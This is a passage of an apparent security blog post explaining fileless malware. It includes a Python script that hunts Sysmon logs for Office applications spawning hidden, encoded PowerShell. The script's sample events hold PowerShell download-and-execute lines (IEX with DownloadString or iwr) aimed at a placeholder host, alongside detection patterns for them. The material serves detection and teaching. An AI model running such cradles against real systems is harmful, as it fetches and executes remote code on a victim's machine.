Cybersecurity is an arms race, with defensive tools and training pushing threat actors to adopt ever more sophisticated and evasive intrusion techniques as they attempt to gain a foothold in victim networks. Most modern endpoint protection (EPP) products readily identify traditional malware payloads as they are downloaded and written to disk, so attackers have turned to fileless malware techniques whose malicious code runs only in memory and leaves little or nothing on the victim’s storage for a file scanner to find.
We’ve covered the anatomy of an endpoint attack in detail before, so let’s dig into fileless malware specifically and examine a real-world endpoint infection to illustrate key defense best practices you need to have in place today.
Understanding fileless malware’s M.O.
Fileless malware is a bit of a misnomer, as it can – and often does – start with a file. While traditional malware contains the bulk of its malicious code within an executable file saved to the victim’s storage drive, fileless malware’s malicious actions reside solely in memory.
With traditional malware, the executable on disk is the infection: quarantine or delete it and the infection is gone, which is why EPP solutions can identify and clean it up so quickly. Fileless malware, on the other hand, uses its initial “dropper” file (usually an Office document or something similar) only to launch a built-in system management tool such as PowerShell and run a short script. That script stages the rest of the attack in memory and hides from defensive tools by injecting the malicious code into other, legitimate processes; beyond the dropper itself, nothing is ever written to the victim’s storage drive.
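Because the dropper has to start a script host, the one moment this chain is visible on disk-less terms is process creation: an Office application spawning PowerShell with a hidden window and an encoded command line. As an added example (not code from the original article), the Python below hunts for exactly that chain over Sysmon process-creation records (Event ID 1). The field names ProcessId, ParentImage, Image and CommandLine are the real Sysmon ones, but the sample events, the staging script and the example.invalid URL are constructed for this illustration, and the application and script-host lists are assumptions to tune for your own environment.

```python
"""
Hunt for the dropper-to-PowerShell chain in Sysmon process creation events
(Event ID 1). Everything here, including the sample events, is constructed
for this example; it is not code from the original article.
"""
import base64
import re

# Office applications that commonly act as the dropper (assumption: extend
# with whatever applications are actually deployed in your environment).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Built-in script hosts the dropper abuses to run the in-memory stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}

# Command-line markers typical of a short downloader/injector stage.
SUSPICIOUS_PATTERNS = {
    "encoded_command": re.compile(r"\s-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
}


def encode_ps(script):
    """Encode a script the way PowerShell expects it for -EncodedCommand
    (base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None when
    the command line carries none or it does not decode cleanly."""
    m = re.search(r"\s-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(ev):
    """Return the list of reason tags that fire for one Sysmon Event ID 1 record."""
    reasons = []
    if basename(ev["ParentImage"]) in OFFICE_PARENTS and basename(ev["Image"]) in SCRIPT_HOSTS:
        reasons.append("office_spawned_script_host")
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Scan the raw command line and the decoded payload, so markers hidden
    # behind -EncodedCommand are still seen.
    for text in (cmdline, decoded or ""):
        for tag, pattern in SUSPICIOUS_PATTERNS.items():
            if tag not in reasons and pattern.search(text):
                reasons.append(tag)
    return reasons


def hunt(events):
    """Return (ProcessId, reasons) for every event worth an alert: an Office
    parent launching a script host is enough on its own; otherwise demand two
    independent command-line markers, since a lone -NoProfile is common in
    legitimate admin scripts."""
    findings = []
    for ev in events:
        reasons = analyze_event(ev)
        if "office_spawned_script_host" in reasons or len(reasons) >= 2:
            findings.append((ev["ProcessId"], reasons))
    return findings


# Constructed staging script and events, modelled on Sysmon Event ID 1 fields.
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGE)},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"ProcessId": 4210, "ParentImage": r"C:\Windows\explorer.exe", "Image": WORD,
     "CommandLine": '"' + WORD + '" /n report.docx'},
    {"ProcessId": 4301, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -ep bypass -c "iex (iwr http://example.invalid/x).Content"'},
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_EVENTS):
        print(pid, ", ".join(reasons))
```

Run as-is, the hunt flags the Word-spawned PowerShell (process 4120, six markers including the cradle recovered from the encoded command) and the policy-bypass download cradle (process 4301), while the scheduled backup script and Word itself pass. Decoding the -EncodedCommand argument is the step most worth keeping: an encoded command line hides every other marker from a naive string match.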
Part of the reason fileless malware has become such a popular attack technique is that it is exceedingly difficult to accurately identify and block the ..